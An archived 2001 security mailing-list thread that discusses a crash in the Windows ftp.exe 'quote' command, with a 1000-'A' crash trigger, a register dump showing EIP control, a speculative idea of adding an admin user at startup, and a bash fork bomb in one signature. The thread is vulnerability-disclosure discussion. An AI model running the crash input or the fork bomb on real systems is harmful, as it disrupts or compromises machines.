Re: ftp.exe buffer overflow ?

[Benjamin Branch <ben () ACMECLICK COM>]

I found that the easiest way to do this is by using the -s:filename option
with ftp.exe.  I did the following in a text file and got it do dump the
stack.

1.  made a test file with the following command in it:
quote site exec A x 1000
2. ran ftp.exe with the following options:
ftp -n -s:test.ftp ftp.example.com
soon afterwards received this little message.

FTP caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00000000 CS=017f EIP=41414141 EFLGS=00010206
EBX=00000000 SS=0187 ESP=0056f5f4 EBP=01008820
ECX=0056f3e8 DS=0187 ESI=010072b8 FS=3b87
EDX=0056e9a8 ES=0187 EDI=7800bb50 GS=5756
Bytes at CS:EIP:

Stack dump:
41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141

 I Think that this confirms Mr. Hassell's post.  If i were to exploit this
on a machine i think it would be easiest done by putting this in the start
up somewhere on ethernet based machine.  Has then been tested on NT?  If so,
the only thing that would need to be done is to have this run on start up
and then have it add a user with admin privs.  I'm not big on writing
exploits, so, I could be wrong on this.

I am also running Win 98 build 4.10.2222 A.  So it looks like it is
exploitable on Win98 and Win98 SE.  I just tried in Windows 2000 Server with
SP1 and it seemed to have no effect on the server.


Benjamin
----- Original Message -----
From: "Riley Hassell" <riley () EEYE COM>
To: <VULN-DEV () SECURITYFOCUS COM>
Sent: Monday, February 12, 2001 12:36 AM
Subject: Re: ftp.exe buffer overflow ?


> This is actually overflowable:
> In my first post I put a note at the bottom showing that sending a large
> buffer with 'A's overwrites the EIP.
>
> Example:
> ftp example.com
> ...login...
> quote site exec AAAAAAAA.....        <--- 1000x'A'
>
> I'm on build 2195 and it directly overwrites the EIP.
>
>
> ----- Original Message -----
> From: "Michal Zalewski" <lcamtuf () BOS BINDVIEW COM>
> To: <VULN-DEV () SECURITYFOCUS COM>
> Sent: Sunday, February 11, 2001 5:45 PM
> Subject: Re: ftp.exe buffer overflow ?
>
>
> > On Mon, 12 Feb 2001, Egemen Tas wrote:
> >
> > > This bug is different from the ones you mentioned..
> > > This is the bug in MS FTP Client's QUOTE command.
> >
> > MS FTP client is surprisingly similar to BSDish ftp client, containing -
> > for example - some similar strings in its binary. It's been discussed on
> > numerous forums long time ago (google.com, search for: "Regents of the
> > University of California" ftp microsoft client). Thus, I bet this is the
> > same as the bug in BSDish ftp client (format bug in quote command), and
is
> > caused by very similar code.
> >
> > > In my opinion this is may be overflowable(because the error occurs in
> the
> > > Stack Segment!(I may be wrong)
> >
> > No, never. I mean this is exploitable, but it is not an overflow and has
> > nothing to do with stack segment.
> >
> > > but does not pose great security risk.Because ftp.exe runs with the
> > > credidentals of currently logged on user.
> >
> > Right =)
> >
> > --
> > _______________________________________________________
> > Michal Zalewski [lcamtuf () bos bindview com] | [security]
> > [http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
> > =--=> Did you know that clones never use mirrors? <=--=